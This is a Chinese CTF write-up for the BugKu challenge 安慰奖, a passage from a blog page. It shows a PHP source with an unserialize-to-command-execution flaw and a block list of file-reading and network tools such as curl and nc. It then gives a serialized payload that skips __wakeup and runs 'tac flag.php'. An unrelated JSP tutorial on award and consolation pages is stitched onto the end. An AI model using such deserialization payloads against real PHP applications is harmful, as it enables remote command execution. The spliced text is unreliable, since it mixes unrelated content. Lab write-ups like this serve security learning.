BugKu_安慰奖

 解码

 

 告诉我有备份文件。

 找到这个

<?php

header("Content-Type: text/html;charset=utf-8");
error_reporting(0);
echo "<!-- YmFja3Vwcw== -->";
class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    function __wakeup()
    {
        $this->username = 'guest';
    }

    function __destruct()
    {
        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
        if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
        }else
        {
            echo "</br>给你个安慰奖吧,hhh!</br>";
            die();
        }
    }
}
    $select = $_GET['code'];
    $res=unserialize(@$select);
?>

代码审计

是个关于反序列化的题目。

过滤了很多读取文件的命令:

不过还剩下tac看来是要读取文件了

关于反序列化:

访问控制修饰符的不同 序列化后的 属性长度和属性值会有所不同,所以这里总结一下:

public(公有)

protected(受保护)

private(私有的)

protected属性被序列化的时候属性值会变成:%00*%00属性名

private属性被序列化的时候属性值会变成:%00类名%00属性名

 PHP的魔术函数也总结一下:


PHP中把以两个下划线__开头的方法称为魔术方法,这些方法在PHP中充当了举足轻重的作用。 魔术方法包括

    __construct(),类的构造函数,当对象创建(new)时会自动调用
    __destruct(),类的析构函数,当对象被销毁时会自动调用
    __call(),在对象中调用一个不可访问方法时调用
    __callStatic(),用静态方式中调用一个不可访问方法时调用
    __get(),获得一个类的成员变量时调用
    __set(),设置一个类的成员变量时调用
    __isset(),当对不可访问属性调用isset()或empty()时调用
    __unset(),当对不可访问属性调用unset()时被调用。
    __sleep(),执行serialize()时,先会调用这个函数
    __wakeup(),执行unserialize()时,先会调用这个函数
    __toString(),类被当成字符串时的回应方法
    __invoke(),调用函数的方式调用一个对象时的回应方法
    __set_state(),调用var_export()导出类时,此静态方法会被调用。
    __clone(),当对象复制完成时调用

所以我构造的payload:

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:2:"ls";}

因为这里是protected所以是%00*%00共占三位

 

code=O:3:%22ctf%22:3:{s:11:%22%00*%00username%22;s:5:%22admin%22;s:6:%22%00*%00cmd%22;s:12:%22tac%20flag.php%22;}

要实现根据得分显示不同项的功能,您可以使用JSP的`<jsp:forward>`标签来实现页面的跳转。以下是一个示例: 首先,在您的项目中创建两个JSP页面,一个是“项页面”(award.jsp),另一个是“安慰页面”(consolation.jsp)。 在award.jsp页面中,您可以编写显示获信息的代码,例如: ```jsp <h1>恭喜您获得一等!</h1> <p>您的得分是:${score}</p> ``` 在consolation.jsp页面中,您可以编写显示安慰信息的代码,例如: ```jsp <h1>很遗憾,您未获得任何项。</h1> <p>您的得分是:${score}</p> ``` 接下来,在您的主要JSP页面中,根据得分使用`<jsp:forward>`标签进行页面跳转。例如: ```jsp <% int score = 65; // 假设得分为65,您可以根据实际情况设置得分 %> <% if (score >= 60) { %> <jsp:forward page="award.jsp"> <jsp:param name="score" value="<%= score %>" /> </jsp:forward> <% } else { %> <jsp:forward page="consolation.jsp"> <jsp:param name="score" value="<%= score %>" /> </jsp:forward> <% } %> ``` 上述代码首先定义了一个假设的得分变量`score`,然后使用条件判断,如果得分大于等于60,就通过`<jsp:forward>`标签跳转到award.jsp页面,并传递得分参数。如果得分小于60,就跳转到consolation.jsp页面,并传递得分参数。 在award.jsp和consolation.jsp页面中,通过`${score}`表达式获取并显示得分参数的值。 请根据您的需求和实际情况修改代码中的得分值和页面内容。 希望这可以帮助到您!如果您有任何进一步的问题,请随时提问。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值